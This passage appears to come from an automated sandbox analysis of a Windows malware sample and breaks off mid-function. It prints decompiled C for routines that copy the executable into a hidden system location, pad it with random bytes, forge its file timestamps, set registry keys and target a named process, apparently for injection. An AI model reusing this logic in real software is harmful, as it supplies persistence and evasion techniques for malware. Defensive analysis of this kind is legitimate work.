    0x00000000
    0x0040b4ff
    0x0040b4ff
    0x0040b502
    0x0040b508
    0x0040b510
    0x00000000
    0x00000000
    0x0040b515
    0x0040b516
    0x0040b51d
    0x00000000
    0x00000000
    0x00000000
    0x0040b51d
    0x00000000

    APIs
    • LoadLibraryA.KERNELBASE(kernel32.dll), ref: 0040B4E8
    • GetProcAddress.KERNELBASE(00000000), ref: 0040B508
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: kernel32.dll
    • API String ID: 2574300362-1793498882
    • Opcode ID: 36bee88d8e5a881228681e7c20b36737f6c0120f57a5269b868846a105bd9ee1
    • Instruction ID: 7ee50df321d16af985c14168c1683ccf43e7a9f3ef2bb0feae8d5c6ef8981bd1
    • Opcode Fuzzy Hash: 36bee88d8e5a881228681e7c20b36737f6c0120f57a5269b868846a105bd9ee1
    • Instruction Fuzzy Hash: 56F0A7313012156BC3106FA5AD448B3B799EFC6745702487BB942E3140EB35D801D6AC
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040628F, Relevance: 40.8, APIs: 27, Instructions: 307synchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 77%
    			_entry_(void* __ebx, void* __edi, void* __esi) {
				signed int _v5;
				int _v12;
				signed int _v13;
				long _v20;
				void* _v24;
				char _v28;
				struct _FILETIME _v36;
				struct _FILETIME _v44;
				struct _FILETIME _v52;
				short _v572;
				short _v1092;
				void* _t76;
				intOrPtr _t78;
				void* _t79;
				signed int _t80;
				signed int _t83;
				intOrPtr _t84;
				intOrPtr _t90;
				signed int _t95;
				signed int _t98;
				void* _t101;
				signed int _t105;
				intOrPtr _t106;
				signed int _t107;
				intOrPtr _t108;
				void* _t119;
				signed int _t122;
				intOrPtr _t125;
				void* _t129;
				long _t142;
				intOrPtr _t150;
				void* _t151;
				intOrPtr _t154;
				intOrPtr _t156;
				intOrPtr _t158;
				signed int _t159;
				void* _t164;
				signed int _t165;
				signed int _t172;
				void* _t174;
				void* _t175;
				intOrPtr _t176;
				void* _t177;
				void* _t178;
				void* _t180;
				void* _t181;

				_t177 = __esi;
				E00407094(); // executed
				_t76 = E0040B585(); // executed
				if(_t76 == 0) {
					return 0;
				}
				_v12 = 0;
				_t172 = GetCommandLineA();
				__eflags = _t172;
				if(_t172 == 0) {
					L11:
					_t78 =  *0x416c34; // 0x25df5a8
					_t10 = _t78 + 0x30; // 0x25df930
					_t79 = CreateMutexW(0x417680, 1,  *_t10); // executed
					_v24 = _t79;
					_t80 = GetLastError();
					__eflags = _t80;
					if(_t80 != 0) {
						L48:
						__eflags = _v24;
						if(_v24 != 0) {
							CloseHandle(_v24);
						}
						E00411FA8(_t170, _t172);
						ExitProcess(0);
					}
					_t83 = E004061FF(); // executed
					_v5 = _t83;
					_t84 =  *0x416c34; // 0x25df5a8
					_v20 = 0;
					_t14 = _t84 + 0x2c; // 0x25df908
					_v13 = 0;
					__eflags = E0040B355( *_t14);
					if(__eflags == 0) {
						L23:
						_push(_t177);
						GetModuleFileNameW(0,  &_v1092, 0x104);
						E0040B770( &_v572);
						_t90 =  *0x416c34; // 0x25df5a8
						_t35 = _t90 + 0xc; // 0x25df7b0
						PathCombineW( &_v572,  &_v572,  *_t35);
						_t95 = lstrcmpiW( &_v1092,  &_v572);
						__eflags = _t95;
						_push( &_v572);
						if(_t95 == 0) {
							_v5 = 0;
							E0040BC89();
							L38:
							__eflags = _v5;
							if(_v5 == 0) {
								_t98 =  *0x416cd0; // 0x0
								_t170 =  *0x416c34; // 0x25df5a8
								_t101 = E0040BA69( *((intOrPtr*)(_t170 + (_t98 & 0x00000001 | 0x00000002) * 8))); // executed
								_t174 = _t101;
								_t178 = E00406A53;
								while(1) {
									_t105 = E00407873(0, _t170, _t178 -  *0x416d84, _t174); // executed
									__eflags = _t105;
									if(_t105 != 0) {
										break;
									}
									Sleep(0x14); // executed
								}
								while(1) {
									_t106 =  *0x416c34; // 0x25df5a8
									_t72 = _t106 + 0x28; // 0x25df8e0
									_t107 = E0040B355( *_t72);
									__eflags = _t107;
									if(_t107 != 0) {
										break;
									}
									Sleep(0x14);
								}
								L47:
								goto L48;
							}
							__eflags = _v13;
							if(__eflags != 0) {
								_t108 =  *0x416c34; // 0x25df5a8
								_t69 = _t108 + 0x2c; // 0x25df908
								E0040B37A(__eflags,  *_t69, 0xa, 0, 0, 0, 0);
							}
							goto L47;
						}
						E0040BC89(); // executed
						E0040FFBF( &_v572);
						CopyFileW( &_v1092,  &_v572, 0); // executed
						SetFileAttributesW( &_v572, 0x26); // executed
						_t119 = CreateFileW( &_v572, 0x40000000, 1, 0, 3, 0, 0); // executed
						_v12 = _t119;
						__eflags = _t119 - 0xffffffff;
						if(_t119 == 0xffffffff) {
							L36:
							SetFileAttributesW( &_v572, 0x21); // executed
							goto L38;
						}
						_t122 = SetFilePointer(_t119, 0, 0, 2); // executed
						__eflags = _t122;
						if(_t122 == 0) {
							L33:
							 *0x416c44(0,  &_v1092, 0x25, 1);
							_t125 =  *0x416c34; // 0x25df5a8
							_t54 = _t125 + 0x5c; // 0x25dfb80
							PathCombineW( &_v1092,  &_v1092,  *_t54);
							_t129 = CreateFileW( &_v1092, 0x80000000, 3, 0, 3, 0, 0); // executed
							_t180 = _t129;
							__eflags = _t180 - 0xffffffff;
							if(_t180 != 0xffffffff) {
								GetFileTime(_t180,  &_v36,  &_v52,  &_v44);
								SetFileTime(_v12,  &_v36,  &_v52,  &_v44); // executed
								FindCloseChangeNotification(_t180); // executed
							}
							CloseHandle(_v12);
							goto L36;
						}
						_t142 = E004101D4(0x400, 0x40) << 9;
						_v20 = _t142;
						__eflags = _t142;
						if(_t142 == 0) {
							_t175 = 0;
							__eflags = 0;
						} else {
							_t175 = E0040F0A8(_t142);
							_t142 = _v20;
						}
						__eflags = _t175;
						if(_t175 == 0) {
							goto L33;
						} else {
							_t181 = 0;
							__eflags = _t142;
							if(_t142 <= 0) {
								L32:
								_t170 =  &_v20;
								WriteFile(_v12, _t175, _t142,  &_v20, 0); // executed
								FlushFileBuffers(_v12);
								E0040F0C0(_t175);
								goto L33;
							} else {
								goto L31;
							}
							do {
								L31:
								 *((char*)(_t181 + _t175)) = E004101D4(E004101D4(0xff, 1), 0);
								_t142 = _v20;
								_t181 = _t181 + 1;
								__eflags = _t181 - _t142;
							} while (_t181 < _t142);
							goto L32;
						}
					}
					_t150 =  *0x416c34; // 0x25df5a8
					_t16 = _t150 + 0x2c; // 0x25df908
					_t151 = E0040B37A(__eflags,  *_t16, 1, 0, 0, 0, 0);
					__eflags = _v12 & 0x00000001;
					if(__eflags != 0) {
						L16:
						_t154 =  *0x416c34; // 0x25df5a8
						_t23 = _t154 + 0x2c; // 0x25df908
						_v12 = 0;
						E0040B37A(__eflags,  *_t23, 0xb,  &_v12,  &_v20, 0, 0);
						_t156 =  *0x416c34; // 0x25df5a8
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						__eflags = _v5;
						if(__eflags == 0) {
							_push(3);
							_t27 = _t156 + 0x2c; // 0x25df908
							_push( *_t27);
							E0040B37A(__eflags);
							while(1) {
								_t158 =  *0x416c34; // 0x25df5a8
								_t28 = _t158 + 0x2c; // 0x25df908
								_t159 = E0040B355( *_t28);
								__eflags = _t159;
								if(_t159 == 0) {
									break;
								}
								Sleep(0x14);
							}
							L21:
							_v13 = 1;
							__eflags = _v12;
							if(_v12 != 0) {
								E0040FFBF(_v12);
								E0040F0C0(_v12);
							}
							goto L23;
						}
						_push(9);
						_t26 = _t156 + 0x2c; // 0x25df908
						_push( *_t26);
						E0040B37A(__eflags);
						goto L21;
					}
					__eflags = _t151 - 0x1020702;
					if(__eflags < 0) {
						goto L16;
					}
					CloseHandle(_v24);
					ExitProcess(0);
				} else {
					_t164 = E0040F521(_t172);
					_t170 =  &_v28;
					_t165 = E0040F37A(_t164,  &_v28, _t172);
					__eflags = _t165;
					if(_t165 <= 0) {
						goto L11;
					}
					_t176 = _v28;
					_t172 = 0;
					__eflags = _t165;
					if(_t165 <= 0) {
						L10:
						E0040F0DC(_t165, _t176);
						goto L11;
					} else {
						goto L5;
					}
					do {
						L5:
						_t170 =  *((intOrPtr*)(_t176 + _t172 * 4));
						__eflags =  *_t170 - 0x2d;
						if( *_t170 == 0x2d) {
							__eflags =  *((char*)(_t170 + 1)) - 0x66;
							if( *((char*)(_t170 + 1)) == 0x66) {
								__eflags =  *(_t170 + 2);
								if( *(_t170 + 2) == 0) {
									_t8 =  &_v12;
									 *_t8 = _v12 | 0x00000001;
									__eflags =  *_t8;
								}
							}
						}
						_t172 = _t172 + 1;
						__eflags = _t172 - _t165;
					} while (_t172 < _t165);
					goto L10;
				}
			}

















































    0x0040628f
    0x00406298
    0x0040629d
    0x004062a4
    0x004062a9
    0x004062a9
    0x004062ae
    0x004062b7
    0x004062b9
    0x004062bb
    0x004062fa
    0x004062fa
    0x004062ff
    0x00406309
    0x0040630f
    0x00406312
    0x00406318
    0x0040631a
    0x00406627
    0x00406627
    0x0040662a
    0x0040662f
    0x0040662f
    0x00406635
    0x0040663b
    0x0040663b
    0x00406320
    0x00406325
    0x00406328
    0x0040632d
    0x00406330
    0x00406333
    0x0040633b
    0x0040633d
    0x004063e9
    0x004063e9
    0x004063f7
    0x00406403
    0x00406408
    0x0040640d
    0x00406418
    0x0040642c
    0x00406432
    0x0040643a
    0x0040643b
    0x004065a5
    0x004065a8
    0x004065ad
    0x004065ad
    0x004065b0
    0x004065cc
    0x004065d1
    0x004065e0
    0x004065e5
    0x004065e7
    0x004065f6
    0x00406602
    0x00406607
    0x00406609
    0x00000000
    0x00000000
    0x004065f0
    0x004065f0
    0x00406615
    0x00406615
    0x0040661a
    0x0040661d
    0x00406622
    0x00406624
    0x00000000
    0x00000000
    0x0040660f
    0x0040660f
    0x00406626
    0x00000000
    0x00406626
    0x004065b2
    0x004065b5
    0x004065b7
    0x004065c2
    0x004065c5
    0x004065c5
    0x00000000
    0x004065b5
    0x00406441
    0x0040644d
    0x00406461
    0x00406470
    0x00406489
    0x0040648f
    0x00406492
    0x00406495
    0x00406594
    0x0040659d
    0x00000000
    0x0040659d
    0x004064a0
    0x004064a6
    0x004064a8
    0x00406514
    0x00406520
    0x00406526
    0x0040652b
    0x00406536
    0x0040654f
    0x00406555
    0x00406557
    0x0040655a
    0x00406569
    0x0040657e
    0x00406585
    0x00406585
    0x0040658e
    0x00000000
    0x0040658e
    0x004064b6
    0x004064b9
    0x004064bc
    0x004064be
    0x004064cc
    0x004064cc
    0x004064c0
    0x004064c5
    0x004064c7
    0x004064c7
    0x004064ce
    0x004064d0
    0x00000000
    0x004064d2
    0x004064d2
    0x004064d4
    0x004064d6
    0x004064f5
    0x004064f6
    0x004064ff
    0x00406508
    0x0040650f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004064d8
    0x004064d8
    0x004064ea
    0x004064ed
    0x004064f0
    0x004064f1
    0x004064f1
    0x00000000
    0x004064d8
    0x004064d0
    0x00406343
    0x0040634e
    0x00406351
    0x00406356
    0x0040635a
    0x00406375
    0x0040637f
    0x00406386
    0x00406389
    0x0040638c
    0x00406391
    0x00406396
    0x00406397
    0x00406398
    0x00406399
    0x0040639a
    0x0040639d
    0x004063ab
    0x004063ad
    0x004063ad
    0x004063b0
    0x004063bf
    0x004063bf
    0x004063c4
    0x004063c7
    0x004063cc
    0x004063ce
    0x00000000
    0x00000000
    0x004063b9
    0x004063b9
    0x004063d0
    0x004063d0
    0x004063d4
    0x004063d7
    0x004063dc
    0x004063e4
    0x004063e4
    0x00000000
    0x004063d7
    0x0040639f
    0x004063a1
    0x004063a1
    0x004063a4
    0x00000000
    0x004063a4
    0x0040635c
    0x00406361
    0x00000000
    0x00000000
    0x00406366
    0x0040636d
    0x004062bd
    0x004062bf
    0x004062c4
    0x004062c7
    0x004062cc
    0x004062ce
    0x00000000
    0x00000000
    0x004062d0
    0x004062d3
    0x004062d5
    0x004062d7
    0x004062f5
    0x004062f5
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004062d9
    0x004062d9
    0x004062d9
    0x004062dc
    0x004062df
    0x004062e1
    0x004062e5
    0x004062e7
    0x004062ea
    0x004062ec
    0x004062ec
    0x004062ec
    0x004062ec
    0x004062ea
    0x004062e5
    0x004062f0
    0x004062f1
    0x004062f1
    0x00000000
    0x004062d9

    APIs
    • GetCommandLineA.KERNEL32 ref: 004062B1
    • CreateMutexW.KERNELBASE(00417680,00000001,025DF930), ref: 00406309
    • GetLastError.KERNEL32 ref: 00406312
    • CloseHandle.KERNEL32(?,025DF908,00000001,00000000,00000000,00000000,00000000,025DF908), ref: 00406366
    • ExitProcess.KERNEL32 ref: 0040636D
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseCommandCreateErrorExitHandleLastLineMutexProcess
    • String ID:
    • API String ID: 1529117804-0
    • Opcode ID: a67ab1fe0345af91154994c26cd64157a5ba996445a2d3d34d645322d4cc096c
    • Instruction ID: 028aaff221cb09249815deb90b67394897e8da99c31c627cd268efbd589bb97a
    • Opcode Fuzzy Hash: a67ab1fe0345af91154994c26cd64157a5ba996445a2d3d34d645322d4cc096c
    • Instruction Fuzzy Hash: 9AB18571500208AFDB10ABA4DD85EEE7B7DEB04304F06817AF602B61A1DB798D558B5D
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040BA69, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 134processCOMMON
    Download Yara Rule
    C-Code - Quality: 76%
    			E0040BA69(WCHAR* _a4) {
				long _v8;
				char _v520;
				short _v522;
				short _v524;
				short _v526;
				char _v528;
				short _v1048;
				long _v1076;
				void* _v1084;
				short _v1604;
				short _v2124;
				short _v2644;
				short _v3164;
				void* _t37;
				intOrPtr _t38;
				signed int _t41;
				struct tagPROCESSENTRY32W* _t47;
				void* _t53;
				WCHAR* _t59;
				void* _t62;
				long _t68;
				int _t74;
				void* _t76;
				void* _t78;
				void* _t80;

				_t37 = CreateToolhelp32Snapshot(2, 0); // executed
				_t76 = _t37;
				if(_t76 != 0xffffffff) {
					_v8 = 0x103;
					if(( *0x416cd0 & 0x00000001) == 0) {
						_t38 =  *0x416c34; // 0x25df5a8
						_t7 = _t38 + 0x1c; // 0x25df7d8
						lstrcpyW( &_v1604,  *_t7);
					} else {
						_t74 = GetUserNameW( &_v1604,  &_v8);
						if(_t74 == 0) {
							_v1604 = _t74;
						}
					}
					_t41 =  *0x416cd0; // 0x0
					_v8 = 0;
					 *0x416c44(0,  &_v3164,  !_t41 & 0x00000001 | 0x00000024, 1, _t78); // executed
					_t47 =  &_v1084;
					_v1084 = 0x22c;
					Process32FirstW(_t76, _t47); // executed
					while(_t47 != 0) {
						if(lstrcmpiW( &_v1048, _a4) != 0) {
							L22:
							_t47 = Process32NextW(_t76,  &_v1084);
							continue;
						}
						_t80 = OpenProcess(0x410, 0, _v1076);
						if(_t80 == 0) {
							goto L22;
						}
						_t53 =  *0x416d80(_t80, 0,  &_v528, 0x104); // executed
						if(_t53 == 0) {
							L21:
							CloseHandle(_t80);
							goto L22;
						}
						PathCombineW( &_v2124,  &_v3164, _a4);
						if(_v528 != 0x5c || _v526 != 0x3f || _v524 != 0x3f || _v522 != 0x5c) {
							_push( &_v2124);
							_t59 =  &_v528;
						} else {
							_push( &_v2124);
							_t59 =  &_v520;
						}
						if(lstrcmpiW(_t59, ??) != 0) {
							goto L21;
						} else {
							if(_v8 == 0) {
								_v8 = _v1076;
							}
							_t62 = E0040C0AE(_t80,  &_v2644); // executed
							if(_t62 == 0 || lstrcmpiW( &_v2644,  &_v1604) != 0) {
								goto L21;
							} else {
								CloseHandle(_t80);
								CloseHandle(_t76);
								_t68 = _v1076;
								L25:
								return _t68;
							}
						}
					}
					CloseHandle(_t76);
					_t68 = _v8;
					goto L25;
				}
				return 0;
			}




























    0x0040ba79
    0x0040ba7f
    0x0040ba84
    0x0040ba94
    0x0040ba9b
    0x0040babb
    0x0040bac0
    0x0040baca
    0x0040ba9d
    0x0040baa8
    0x0040bab0
    0x0040bab2
    0x0040bab2
    0x0040bab0
    0x0040bad0
    0x0040bae9
    0x0040baec
    0x0040baf2
    0x0040bafa
    0x0040bb04
    0x0040bc11
    0x0040bb21
    0x0040bc03
    0x0040bc0b
    0x00000000
    0x0040bc0b
    0x0040bb39
    0x0040bb3d
    0x00000000
    0x00000000
    0x0040bb51
    0x0040bb59
    0x0040bbfc
    0x0040bbfd
    0x00000000
    0x0040bbfd
    0x0040bb70
    0x0040bb7e
    0x0040bbb3
    0x0040bbb4
    0x0040bb9e
    0x0040bba4
    0x0040bba5
    0x0040bba5
    0x0040bbc3
    0x00000000
    0x0040bbc5
    0x0040bbc8
    0x0040bbd0
    0x0040bbd0
    0x0040bbdb
    0x0040bbe2
    0x00000000
    0x0040bc2a
    0x0040bc2b
    0x0040bc32
    0x0040bc38
    0x0040bc23
    0x00000000
    0x0040bc23
    0x0040bbe2
    0x0040bbc3
    0x0040bc1a
    0x0040bc20
    0x00000000
    0x0040bc20
    0x00000000

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040BA79
    • GetUserNameW.ADVAPI32(?,00000103), ref: 0040BAA8
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000001,?,?,00000000), ref: 0040BAEC
    • Process32FirstW.KERNEL32(00000000,?), ref: 0040BB04
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040BC1A
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040BC2B
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040BC32
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandle$CreateFirstFolderNamePathProcess32SnapshotSpecialToolhelp32User
    • String ID: ?$?$\$\
    • API String ID: 4249123633-2781376886
    • Opcode ID: 8406c4a8a3268cf8435ef29c5b72c8ec3dbfec2cf1da62b9567bde33fc2f5594
    • Instruction ID: 75fa0fa9a2bd7d5adac2d3f5ac7ce9fb80f390764a06cb9fbc006abfa5dc3521
    • Opcode Fuzzy Hash: 8406c4a8a3268cf8435ef29c5b72c8ec3dbfec2cf1da62b9567bde33fc2f5594
    • Instruction Fuzzy Hash: D4512075900219ABDB219B60DC48EEB77BCFB44305F0181B6E615E2190DB78DA85DF9C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00406373, Relevance: 28.7, APIs: 19, Instructions: 164filesleeptimeCOMMON
    Download Yara Rule
    C-Code - Quality: 92%
    			E00406373() {
				DWORD* _t47;
				int _t52;
				signed int _t55;
				void* _t58;
				void* _t62;
				DWORD* _t63;
				void* _t64;
				DWORD* _t67;
				void* _t78;
				long _t81;
				DWORD* _t84;
				void* _t88;
				long _t101;
				struct _OVERLAPPED* _t109;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t116;
				void* _t117;
				void* _t118;

				GetModuleFileNameW(_t109, _t118 - 0x440, 0x104);
				E0040B770(_t118 - 0x238);
				_t47 =  *0x416c34; // 0x25df5a8
				_t3 =  &(_t47[3]); // 0x25df7b0
				PathCombineW(_t118 - 0x238, _t118 - 0x238,  *_t3);
				_t52 = lstrcmpiW(_t118 - 0x440, _t118 - 0x238);
				_push(_t118 - 0x238);
				if(_t52 == 0) {
					 *(_t118 - 1) = _t109;
					E0040BC89();
					goto L16;
				} else {
					E0040BC89(); // executed
					E0040FFBF(_t118 - 0x238);
					CopyFileW(_t118 - 0x440, _t118 - 0x238, _t109); // executed
					SetFileAttributesW(_t118 - 0x238, 0x26); // executed
					_t78 = CreateFileW(_t118 - 0x238, 0x40000000, 1, _t109, 3, _t109, _t109); // executed
					 *(_t118 - 8) = _t78;
					if(_t78 == 0xffffffff) {
						L14:
						SetFileAttributesW(_t118 - 0x238, 0x21); // executed
						L16:
						if( *(_t118 - 1) == _t109) {
							_t55 =  *0x416cd0; // 0x0
							_t110 =  *0x416c34; // 0x25df5a8
							_t58 = E0040BA69( *((intOrPtr*)(_t110 + (_t55 & 0x00000001 | 0x00000002) * 8))); // executed
							_t112 = _t58;
							_t114 = E00406A53;
							while(1) {
								_t62 = E00407873(0, _t110, _t114 -  *0x416d84, _t112); // executed
								__eflags = _t62;
								if(_t62 != 0) {
									break;
								}
								Sleep(0x14); // executed
							}
							while(1) {
								_t63 =  *0x416c34; // 0x25df5a8
								_t40 =  &(_t63[0xa]); // 0x25df8e0
								_t64 = E0040B355( *_t40);
								__eflags = _t64;
								if(_t64 != 0) {
									break;
								}
								Sleep(0x14);
							}
							L25:
							if( *(_t118 - 0x14) != _t109) {
								CloseHandle( *(_t118 - 0x14));
							}
							E00411FA8(_t110, _t111);
							ExitProcess(_t109);
						}
						_t128 =  *((intOrPtr*)(_t118 - 9)) - _t109;
						if( *((intOrPtr*)(_t118 - 9)) != _t109) {
							_t67 =  *0x416c34; // 0x25df5a8
							_t37 =  &(_t67[0xb]); // 0x25df908
							E0040B37A(_t128,  *_t37, 0xa, _t109, _t109, _t109, _t109);
						}
						goto L25;
					}
					_t81 = SetFilePointer(_t78, _t109, _t109, 2); // executed
					if(_t81 == 0) {
						L11:
						 *0x416c44(_t109, _t118 - 0x440, 0x25, 1);
						_t84 =  *0x416c34; // 0x25df5a8
						_t22 =  &(_t84[0x17]); // 0x25dfb80
						PathCombineW(_t118 - 0x440, _t118 - 0x440,  *_t22);
						_t88 = CreateFileW(_t118 - 0x440, 0x80000000, 3, _t109, 3, _t109, _t109); // executed
						_t116 = _t88;
						if(_t116 != 0xffffffff) {
							GetFileTime(_t116, _t118 - 0x20, _t118 - 0x30, _t118 - 0x28);
							SetFileTime( *(_t118 - 8), _t118 - 0x20, _t118 - 0x30, _t118 - 0x28); // executed
							FindCloseChangeNotification(_t116); // executed
						}
						CloseHandle( *(_t118 - 8));
						goto L14;
					}
					_t101 = E004101D4(0x400, 0x40) << 9;
					 *(_t118 - 0x10) = _t101;
					if(_t101 == _t109) {
						_t113 = 0;
						__eflags = 0;
					} else {
						_t113 = E0040F0A8(_t101);
						_t101 =  *(_t118 - 0x10);
					}
					if(_t113 == _t109) {
						goto L11;
					} else {
						_t117 = 0;
						if(_t101 <= _t109) {
							L10:
							_t110 = _t118 - 0x10;
							WriteFile( *(_t118 - 8), _t113, _t101, _t118 - 0x10, _t109); // executed
							FlushFileBuffers( *(_t118 - 8));
							E0040F0C0(_t113);
							goto L11;
						} else {
							goto L9;
						}
						do {
							L9:
							 *((char*)(_t117 + _t113)) = E004101D4(E004101D4(0xff, 1), _t109);
							_t101 =  *(_t118 - 0x10);
							_t117 = _t117 + 1;
						} while (_t117 < _t101);
						goto L10;
					}
				}
			}
























    0x004063f7
    0x00406403
    0x00406408
    0x0040640d
    0x00406418
    0x0040642c
    0x0040643a
    0x0040643b
    0x004065a5
    0x004065a8
    0x00000000
    0x00406441
    0x00406441
    0x0040644d
    0x00406461
    0x00406470
    0x00406489
    0x0040648f
    0x00406495
    0x00406594
    0x0040659d
    0x004065ad
    0x004065b0
    0x004065cc
    0x004065d1
    0x004065e0
    0x004065e5
    0x004065e7
    0x004065f6
    0x00406602
    0x00406607
    0x00406609
    0x00000000
    0x00000000
    0x004065f0
    0x004065f0
    0x00406615
    0x00406615
    0x0040661a
    0x0040661d
    0x00406622
    0x00406624
    0x00000000
    0x00000000
    0x0040660f
    0x0040660f
    0x00406626
    0x0040662a
    0x0040662f
    0x0040662f
    0x00406635
    0x0040663b
    0x0040663b
    0x004065b2
    0x004065b5
    0x004065b7
    0x004065c2
    0x004065c5
    0x004065c5
    0x00000000
    0x004065b5
    0x004064a0
    0x004064a8
    0x00406514
    0x00406520
    0x00406526
    0x0040652b
    0x00406536
    0x0040654f
    0x00406555
    0x0040655a
    0x00406569
    0x0040657e
    0x00406585
    0x00406585
    0x0040658e
    0x00000000
    0x0040658e
    0x004064b6
    0x004064b9
    0x004064be
    0x004064cc
    0x004064cc
    0x004064c0
    0x004064c5
    0x004064c7
    0x004064c7
    0x004064d0
    0x00000000
    0x004064d2
    0x004064d2
    0x004064d6
    0x004064f5
    0x004064f6
    0x004064ff
    0x00406508
    0x0040650f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004064d8
    0x004064d8
    0x004064ea
    0x004064ed
    0x004064f0
    0x004064f1
    0x00000000
    0x004064d8
    0x004064d0

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,025DF908), ref: 004063F7
      • Part of subcall function 0040B770: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,00406408,?,025DF908), ref: 0040B791
    • PathCombineW.SHLWAPI(?,?,025DF7B0,?,025DF908), ref: 00406418
    • lstrcmpiW.KERNEL32(?,?,?,025DF908), ref: 0040642C
    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,025DF908), ref: 00406461
    • SetFileAttributesW.KERNELBASE(?,00000026,?,025DF908), ref: 00406470
    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000000,00000000,?,025DF908), ref: 00406489
    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,025DF908), ref: 004064A0
    • WriteFile.KERNELBASE(?,00000000,00000000,?,00000000,00000040,?,025DF908), ref: 004064FF
    • FlushFileBuffers.KERNEL32(?,?,025DF908), ref: 00406508
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000001,?,025DF908), ref: 00406520
    • PathCombineW.SHLWAPI(?,?,025DFB80,?,025DF908), ref: 00406536
    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,025DF908), ref: 0040654F
    • GetFileTime.KERNEL32(00000000,?,?,?,?,025DF908), ref: 00406569
    • SetFileTime.KERNELBASE(?,?,?,?,?,025DF908), ref: 0040657E
    • FindCloseChangeNotification.KERNELBASE(00000000,?,025DF908), ref: 00406585
    • CloseHandle.KERNEL32(?,?,025DF908), ref: 0040658E
    • SetFileAttributesW.KERNELBASE(?,00000021,?,025DF908), ref: 0040659D
    • Sleep.KERNELBASE(00000014,-00010331,00000000,025DF5A8,?,?,025DF908), ref: 004065F0
    • Sleep.KERNEL32(00000014,025DF8E0,-00010331,00000000,?,025DF908), ref: 0040660F
    • CloseHandle.KERNEL32(?), ref: 0040662F
    • ExitProcess.KERNEL32 ref: 0040663B
      • Part of subcall function 0040BC89: RegCreateKeyExW.KERNELBASE(80000002,025DFA18,00000000,00000000,00000000,00000003,00000000,?,00000000,?,?,00000000,025DF908), ref: 0040BCBB
      • Part of subcall function 0040BC89: RegQueryValueExW.KERNELBASE(?,025DF958,00000000,00000000,00000000,?,?,?,00000000,025DF908), ref: 0040BCDE
      • Part of subcall function 0040BC89: RegQueryValueExW.KERNELBASE(?,025DF958,00000000,00000000,00000000,?,?,?,00000000,025DF908), ref: 0040BD0F
      • Part of subcall function 0040BC89: StrCmpNIW.SHLWAPI(00000002,?,025DF908,?,?,00000000,025DF908), ref: 0040BD39
      • Part of subcall function 0040BC89: RegCloseKey.KERNELBASE(?,?,?,00000000,025DF908), ref: 0040BDBB
      • Part of subcall function 0040FFBF: SetFileAttributesW.KERNELBASE(?,00000020,00412063,?,?,?,00000000), ref: 0040FFC5
      • Part of subcall function 0040FFBF: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 0040FFCF
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$ClosePath$AttributesCreate$CombineFolderHandleQuerySleepSpecialTimeValue$BuffersChangeCopyDeleteExitFindFlushModuleNameNotificationPointerProcessWritelstrcmpi
    • String ID:
    • API String ID: 39726543-0
    • Opcode ID: 3b2bdba17f1836de577f9c6bccdc1b1304bd904d466087f32d4689b458ad152d
    • Instruction ID: 58c9de0474e63ac647c2018957a64604130a9d5d51a627cdae8671de152b874c
    • Opcode Fuzzy Hash: 3b2bdba17f1836de577f9c6bccdc1b1304bd904d466087f32d4689b458ad152d
    • Instruction Fuzzy Hash: 435122B2900219BFDB10ABA0DC88EEE777CEB04304F054576F605F61A0DB799A958B69
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040BC89, Relevance: 12.1, APIs: 8, Instructions: 134registrystringCOMMON
    Download Yara Rule
    C-Code - Quality: 98%
    			E0040BC89(WCHAR* _a4) {
				int _v8;
				void* _v12;
				int _v16;
				intOrPtr _t45;
				long _t46;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t59;
				signed int _t61;
				intOrPtr _t71;
				signed int _t72;
				short _t74;
				int _t76;
				char* _t77;
				WCHAR* _t82;
				int _t84;
				char* _t85;
				signed int _t87;
				signed int _t88;

				_t76 = 0;
				_t84 = E0040F533(_a4);
				_t45 =  *0x416c34; // 0x25df5a8
				_t3 = _t45 + 0x3c; // 0x25dfa18
				_v16 = _t84;
				_t46 = RegCreateKeyExW(0x80000002,  *_t3, 0, 0, 0, 3, 0,  &_v12, 0); // executed
				if(_t46 != 0) {
					L18:
					_t39 = _t84 + 2; // 0x25df90a
					_t48 =  *0x416c34; // 0x25df5a8
					_t41 = _t48 + 0x44; // 0x25df958
					_t42 = _t48 + 0x40; // 0x25dfa90
					_t76 = E004080D1(0x80000001,  *_t42,  *_t41, 1, _a4, _t84 + _t39);
				} else {
					_t52 =  *0x416c34; // 0x25df5a8
					_t6 = _t52 + 0x44; // 0x25df958
					_v8 = 0;
